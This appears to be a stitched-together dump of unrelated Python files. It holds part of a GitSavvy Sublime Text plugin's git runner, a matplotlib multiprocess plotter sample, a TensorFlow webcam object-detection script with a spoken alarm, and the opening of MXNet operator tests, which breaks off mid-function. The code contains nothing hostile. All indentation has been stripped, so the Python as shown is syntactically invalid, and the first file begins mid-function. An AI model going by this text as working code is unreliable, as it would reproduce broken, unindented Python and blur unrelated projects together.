sublime.active_window().run_command("hide_panel", {"cancel": True})
live_panel_output = self.savvy_settings.get("live_panel_output", False)
stdout, stderr = None, None
try:
if not working_dir:
working_dir = self.repo_path
except RuntimeError as e:
# do not show panel when the window does not exist
raise GitSavvyError(e, show_panel=False)
except Exception as e:
# offer initialization when "Not a git repository" is thrown from self.repo_path
if type(e) == ValueError and e.args and "Not a git repository" in e.args[0]:
sublime.set_timeout_async(
lambda: sublime.active_window().run_command("gs_offer_init"))
raise GitSavvyError(e)
try:
startupinfo = None
if os.name == "nt":
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
environ = os.environ.copy()
environ.update(custom_environ or {})
start = time.time()
p = subprocess.Popen(command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=working_dir,
env=environ,
startupinfo=startupinfo)
def initialize_panel():
# clear panel
util.log.panel("")
if self.savvy_settings.get("show_stdin_in_output") and stdin is not None:
util.log.panel_append("STDIN\n{}\n".format(stdin))
if self.savvy_settings.get("show_input_in_output"):
util.log.panel_append("> {}\n".format(command_str))
if show_panel and live_panel_output:
wrapper = LoggingProcessWrapper(p, self.savvy_settings.get("live_panel_output_timeout", 10000))
initialize_panel()
if stdin is not None and encode:
stdin = stdin.encode(encoding=stdin_encoding)
if show_panel and live_panel_output:
stdout, stderr = wrapper.communicate(stdin)
else:
stdout, stderr = p.communicate(stdin)
if decode:
stdout, stderr = self.decode_stdout(stdout), self.decode_stdout(stderr)
if show_panel and not live_panel_output:
initialize_panel()
if stdout:
util.log.panel_append(stdout)
if stderr:
if stdout:
util.log.panel_append("\n")
util.log.panel_append(stderr)
except Exception as e:
# this should never be reached
raise GitSavvyError("Please report this error to GitSavvy:\n\n{}\n\n{}".format(e, traceback.format_exc()))
finally:
end = time.time()
if decode:
util.debug.log_git(args, stdin, stdout, stderr, end - start)
else:
util.debug.log_git(
args,
stdin,
self.decode_stdout(stdout),
self.decode_stdout(stderr),
end - start
)
if show_panel and self.savvy_settings.get("show_time_elapsed_in_output", True):
util.log.panel_append("\n[Done in {:.2f}s]".format(end - start))
if throw_on_stderr and not p.returncode == 0:
sublime.active_window().status_message(
"Failed to run `git {}`. See log for details.".format(command[1])
)
if "*** Please tell me who you are." in stderr:
sublime.set_timeout_async(
lambda: sublime.active_window().run_command("gs_setup_user"))
if stdout or stderr:
raise GitSavvyError("`{}` failed with following output:\n{}\n{}".format(
command_str, stdout, stderr
))
else:
raise GitSavvyError("`{}` failed.".format(command_str))
return stdout
def decode_stdout(self, stdout):
fallback_encoding = self.savvy_settings.get("fallback_encoding")
silent_fallback = self.savvy_settings.get("silent_fallback")
try:
return stdout.decode()
except UnicodeDecodeError:
try:
return stdout.decode("latin-1")
except UnicodeDecodeError as unicode_err:
if silent_fallback or sublime.ok_cancel_dialog(UTF8_PARSE_ERROR_MSG, "Fallback?"):
try:
return stdout.decode(fallback_encoding)
except UnicodeDecodeError as fallback_err:
sublime.error_message(FALLBACK_PARSE_ERROR_MSG)
raise fallback_err
raise unicode_err
@property
def encoding(self):
return "UTF-8"
@property
def git_binary_path(self):
"""
Return the path to the available `git` binary.
"""
global git_path, error_message_displayed
if not git_path:
git_path_setting = self.savvy_settings.get("git_path")
if isinstance(git_path_setting, dict):
git_path = git_path_setting.get(sublime.platform())
if not git_path:
git_path = git_path_setting.get('default')
else:
git_path = git_path_setting
if not git_path:
git_path = shutil.which("git")
try:
startupinfo = None
if os.name == "nt":
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
stdout = subprocess.check_output(
[git_path, "--version"],
stderr=subprocess.PIPE,
startupinfo=startupinfo).decode("utf-8")
except Exception:
stdout = ""
git_path = None
match = re.match(r"git version ([0-9]+)\.([0-9]+)\.([0-9]+)", stdout)
if match:
major = int(match.group(1))
minor = int(match.group(2))
patch = int(match.group(3))
if major < GIT_REQUIRE_MAJOR \
or (major == GIT_REQUIRE_MAJOR and minor < GIT_REQUIRE_MINOR) \
or (major == GIT_REQUIRE_MAJOR and minor == GIT_REQUIRE_MINOR and patch < GIT_REQUIRE_PATCH):
msg = GIT_TOO_OLD_MSG.format(
GIT_REQUIRE_MAJOR,
GIT_REQUIRE_MINOR,
GIT_REQUIRE_PATCH)
git_path = None
if not error_message_displayed:
sublime.error_message(msg)
error_message_displayed = True
raise ValueError("Git binary too old.")
if not git_path:
msg = ("Your Git binary cannot be found. If it is installed, add it "
"to your PATH environment variable, or add a `git_path` setting "
"in the GitSavvy settings.")
if not error_message_displayed:
sublime.error_message(msg)
error_message_displayed = True
raise ValueError("Git binary not found.")
return git_path
def find_working_dir(self):
view = self.window.active_view() if hasattr(self, "window") else self.view
window = view.window() if view else None
if view and view.file_name():
file_dir = os.path.dirname(view.file_name())
if os.path.isdir(file_dir):
return file_dir
if window:
folders = window.folders()
if folders and os.path.isdir(folders[0]):
return folders[0]
return None
def find_repo_path(self):
"""
Similar to find_working_dir, except that it does not stop on the first
directory found, rather on the first git repository found.
"""
view = self.window.active_view() if hasattr(self, "window") else self.view
window = view.window() if view else None
repo_path = None
# try the current file first
if view and view.file_name():
file_dir = os.path.dirname(view.file_name())
if os.path.isdir(file_dir):
repo_path = self.find_git_toplevel(file_dir, throw_on_stderr=False)
# fallback: use the first folder if the current file is not inside a git repo
if not repo_path:
if window:
folders = window.folders()
if folders and os.path.isdir(folders[0]):
repo_path = self.find_git_toplevel(
folders[0], throw_on_stderr=False)
return os.path.realpath(repo_path) if repo_path else None
def find_git_toplevel(self, folder, throw_on_stderr):
stdout = self.git(
"rev-parse",
"--show-toplevel",
working_dir=folder,
throw_on_stderr=throw_on_stderr
)
repo = stdout.strip()
return os.path.realpath(repo) if repo else None
@property
def repo_path(self):
"""
Return the absolute path to the git repo that contains the file that this
view interacts with. Like `file_path`, this can be overridden by setting
the view's `git_savvy.repo_path` setting.
"""
# The below condition will be true if run from a WindowCommand and false
# from a TextCommand.
view = self.window.active_view() if hasattr(self, "window") else self.view
repo_path = view.settings().get("git_savvy.repo_path") if view else None
if not repo_path or not os.path.exists(repo_path):
repo_path = self.find_repo_path()
if not repo_path:
window = view.window()
if window:
if window.folders():
raise ValueError("Not a git repository.")
else:
raise ValueError("Unable to determine Git repo path.")
else:
raise RuntimeError("Window does not exist.")
if view:
file_name = view.file_name()
# only set "git_savvy.repo_path" when the current file is in repo_path
if file_name and os.path.realpath(file_name).startswith(repo_path + os.path.sep):
view.settings().set("git_savvy.repo_path", repo_path)
return os.path.realpath(repo_path) if repo_path else repo_path
@property
def short_repo_path(self):
if "HOME" in os.environ:
return self.repo_path.replace(os.environ["HOME"], "~")
else:
return self.repo_path
@property
def file_path(self):
"""
Return the absolute path to the file this view interacts with. In most
cases, this will be the open file. However, for views with special
functionality, this default behavior can be overridden by setting the
view's `git_savvy.file_path` setting.
"""
# The below condition will be true if run from a WindowCommand and false
# from a TextCommand.
view = self.window.active_view() if hasattr(self, "window") else self.view
fpath = view.settings().get("git_savvy.file_path")
if not fpath:
fpath = view.file_name()
if fpath:
view.settings().set("git_savvy.file_path", os.path.realpath(fpath))
return os.path.realpath(fpath) if fpath else fpath
def get_rel_path(self, abs_path=None):
"""
Return the file path relative to the repo root.
"""
path = abs_path or self.file_path
return os.path.relpath(os.path.realpath(path), start=self.repo_path)
def _include_global_flags(self, args):
"""
Transforms the Git command arguments with flags indicated in the
global GitSavvy settings.
"""
git_cmd, *addl_args = args
global_flags = self.savvy_settings.get("global_flags")
if global_flags and git_cmd in global_flags:
args = [git_cmd] + global_flags[git_cmd] + addl_args
return args
@property
def last_remote_used(self):
"""
With this getter and setter, keep global track of last remote used
for each repo. Will return whatever was set last, or active remote
if never set. If there is no tracking remote, use "origin".
"""
remote = self._last_remotes_used.get(self.repo_path)
if not remote:
remote = self.get_upstream_for_active_branch().split("/")[0]
if not remote:
remote = "origin"
return remote
@last_remote_used.setter
def last_remote_used(self, value):
"""
Setter for above property. Saves per-repo information in
class attribute dict.
"""
self._last_remotes_used[self.repo_path] = value
|
plotter.py
|
import multiprocessing as mp
import time
import matplotlib.pyplot as plt
import numpy as np
# Sample code from:
# https://matplotlib.org/3.3.3/gallery/misc/multiprocess_sgskip.html#sphx-glr-gallery-misc-multiprocess-sgskip-py
class ProcessPlotter:
def __init__(self):
self.x = []
self.y = []
def terminate(self):
plt.close('all')
def call_back(self):
while self.pipe.poll():
command = self.pipe.recv()
if command is None:
self.terminate()
return False
else:
self.x.append(command[0])
self.y.append(command[1])
self.ax.plot(self.x, self.y, 'ro')
self.fig.canvas.draw()
return True
def __call__(self, pipe):
print('starting plotter...')
self.pipe = pipe
self.fig, self.ax = plt.subplots()
timer = self.fig.canvas.new_timer(interval=1000)
timer.add_callback(self.call_back)
timer.start()
print('...done')
plt.show()
class NBPlot:
def __init__(self):
self.plot_pipe, plotter_pipe = mp.Pipe()
self.plotter = ProcessPlotter()
self.plot_process = mp.Process(
target=self.plotter, args=(plotter_pipe,), daemon=True)
self.plot_process.start()
def plot(self, finished=False):
send = self.plot_pipe.send
if finished:
send(None)
else:
data = np.random.random(2)
send(data)
def main():
pl = NBPlot()
for ii in range(10):
pl.plot()
time.sleep(0.5)
pl.plot(finished=True)
if __name__ == '__main__':
if plt.get_backend() == "MacOSX":
mp.set_start_method("forkserver")
main()
|
run.py
|
import os # To Perform OS level works.
import six
import cv2 # OpenCV for Computer Vision
import labelcolors # It has a dictionary that contains colors for each label
import argparse # To get arguments
import collections
import numpy as np
import pyttsx3 # To perform text to speech function
import threading # To perform multi-threading operations
import playsound # To play sounds
import tensorflow as tf # Main Library.
from object_detection.utils import label_map_util # To handle label map.
from object_detection.utils import config_util # To load model pipeline.
from object_detection.utils import visualization_utils as viz_utils # To draw rectangles.
from object_detection.builders import model_builder # To load & Build models.
ap = argparse.ArgumentParser() # Create argparse object
ap.add_argument("-m", "--model_name", required=True, help="Name of the model") # Create model_name argument
ap.add_argument("-l", "--labels", required=True, help="Labels that are needed to be detected") # Create labels argument
ap.add_argument("-a", "--alarm", required=True, help="Alram status") # Alarm required or not argument
ap.add_argument("-t", "--minimum_threshold", required=True, help="Minimum threshold of detection rate") # minimum_threshol
ap.add_argument("-s", "--source", required=True, help="Source of processing") # video / webcam
args = vars(ap.parse_args()) # Build argparse
#Text to speech setup.
engine = pyttsx3.init()
en_voice_id = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Speech\Voices\Tokens\TTS_MS_EN-US_ZIRA_11.0" # female
ru_voice_id = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Speech\Voices\Tokens\TTS_MS_RU-RU_IRINA_11.0" # male
engine.setProperty('voice', en_voice_id)
rate = engine.getProperty('rate')
engine.setProperty('rate', rate - 25)
alarm_text_to_speech_notes = ""
def load_alarm_text_to_speech_notes():
global alarm_text_to_speech_notes
if args["alarm"] == "[TRUE]":
file = open('system-files//alarm-text-to-speech-notes.txt')
alarm_text_to_speech_notes = file.readline().strip()
load_alarm_text_to_speech_notes()
def talk_function(text): # Text to speech convertion
print("Computer: {}".format(text))
engine.say(text)
engine.runAndWait()
number_of_time_detected = 0
def play_alarm(): # Function to play sound
global number_of_time_detected
number_of_time_detected
playsound.playsound("system-files//alarm.mp3")
talk_function(alarm_text_to_speech_notes)
number_of_time_detected = 0
# Enable GPU dynamic memory allocation
gpus = tf.config.experimental.list_physical_devices('GPU')
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
processing_type = "" # Store processing type.
labels = [] # Store Labels in a list.
model_config_path = f'data/models/{args["model_name"]}/pipeline.config' # Store the path of config file
checkpoint_model_path = f'data/models/{args["model_name"]}/checkpoint/ckpt-0' # Store the path of model
label_map_path = f'data/mscoco_label_map.pbtxt' # Store the path of label_map
if args['labels'] == "all_labels":
processing_type = "all_labels" # Change processing_type as all_labels
else:
processing_type = "labels" # Change as labels to perform
if processing_type == "labels":
labels = args['labels'].split(",") # Store given labels to the labels list.
# Load pipeline config and build a detection model
configs = config_util.get_configs_from_pipeline_file(model_config_path)
model_config = configs['model']
detection_model = model_builder.build(model_config=model_config, is_training=False)
# Restore checkpoint
ckpt = tf.compat.v2.train.Checkpoint(model=detection_model)
ckpt.restore(checkpoint_model_path).expect_partial()
@tf.function
def detect_fn(image):
"""Detect objects in image."""
image, shapes = detection_model.preprocess(image)
prediction_dict = detection_model.predict(image, shapes)
detections = detection_model.postprocess(prediction_dict, shapes)
return detections, prediction_dict, tf.reshape(shapes, [-1])
category_index = label_map_util.create_category_index_from_labelmap(label_map_path,
use_display_name=True)
video_source = "";
if str(args["source"]).split("|")[0] == "[WEBCAM]":
video_source = int(args["source"].split("|")[1])
elif str(args["source"]).split("|")[0] == "[VIDEO]":
video_source = str(args["source"].split("|")[1])
cap = cv2.VideoCapture(video_source)
while True:
# Read frame from camera
ret, image_np = cap.read()
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(image_np, axis=0)
# Things to try:
# Flip horizontally
# image_np = np.fliplr(image_np).copy()
# Convert image to grayscale
# image_np = np.tile(
# np.mean(image_np, 2, keepdims=True), (1, 1, 3)).astype(np.uint8)
input_tensor = tf.convert_to_tensor(np.expand_dims(image_np, 0), dtype=tf.float32)
detections, predictions_dict, shapes = detect_fn(input_tensor)
label_id_offset = 1
image_np_with_detections = image_np.copy()
min_score_thresh = int(f'{args["minimum_threshold"]}') / 100
box_to_display_str_map = collections.defaultdict(list)
box_to_color_map = collections.defaultdict(str)
number_of_items = 0
for i in range(detections['detection_boxes'][0].numpy().shape[0]):
if detections['detection_scores'][0].numpy() is None or detections['detection_scores'][0].numpy()[i] > min_score_thresh:
box = tuple(detections['detection_boxes'][0].numpy()[i].tolist())
display_str = ""
if(detections['detection_classes'][0].numpy() + label_id_offset).astype(int)[i] in six.viewkeys(category_index):
class_name = category_index[(detections['detection_classes'][0].numpy() + label_id_offset).astype(int)[i]]['name']
display_str = '{}'.format(class_name)
box_to_display_str_map[box].append(display_str) # Join the number of eleements with label Name
im_width, im_height = image_np.shape[1::-1]
for box, color in box_to_display_str_map.items():
ymin, xmin, ymax, xmax = box
ymin = ymin * im_height
xmin = xmin * im_width
ymax = ymax * im_height
xmax = xmax * im_width
x = xmin
y = ymin
w = xmax - xmin
h = ymax - ymin
if box_to_display_str_map[box][0].replace("_"," ") in labels: # Get only label name not the total number of items
try: # Getting color from labelcolors.label_with_colors
r = int(labelcolors.label_with_colors[box_to_display_str_map[box][0]].split(",")[0])
g = int(labelcolors.label_with_colors[box_to_display_str_map[box][0]].split(",")[1])
b = int(labelcolors.label_with_colors[box_to_display_str_map[box][0]].split(",")[2])
except Exception as e: # If suppose color is not found for the label, it will be assgined as red.
r = 255
g = 0
b = 0
if args["alarm"] == "[TRUE]":
number_of_time_detected = number_of_time_detected + 1
if number_of_time_detected == 20:
thread1 = threading.Thread(target = play_alarm)
thread1.start()
cv2.rectangle(image_np_with_detections, (int(x),int(y)), (int(x) + int(w), int(y) + int(h)), (b, g, r), 4)
(tw, th), _ = cv2.getTextSize(box_to_display_str_map[box][0], cv2.FONT_HERSHEY_SIMPLEX, 0.7, 2)
# Prints the text.
img = cv2.rectangle(image_np_with_detections, (int(x), int(y) - 30), (int(x) + 20 + tw, int(y)), (b, g, r), -1)
img = cv2.putText(image_np_with_detections, box_to_display_str_map[box][0].upper(), (int(x)+5, int(y) - 5), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0,0,0), 2)
# Display output
cv2.imshow('object detection', cv2.resize(image_np_with_detections, (800, 600)))
if cv2.waitKey(25) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import setup_module, with_seed, teardown_module, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import run_in_spawned_process, xfail_when_nonstandard_decimal_separator
import pytest
import os
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym.bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@with_seed()
@pytest.mark.serial
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
@pytest.mark.serial
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
@pytest.mark.serial
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
@pytest.mark.serial
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym.bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out.bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@with_seed()
@pytest.mark.serial
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out.bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
@with_seed()
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
@with_seed()
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym.simple_bind(ctx=default_context(), data=data_npy.shape)
assert len(exe.outputs) == num_outputs
outputs = exe.forward(is_train=True, data=data_npy)
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
exe.backward(out_grads=[mx.nd.array(ele, ctx=default_context()) for ele in out_grads_npy])
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s.bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap.bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx.bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@xfail_when_nonstandard_decimal_separator
@with_seed()
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
@with_seed()
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
@with_seed()
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
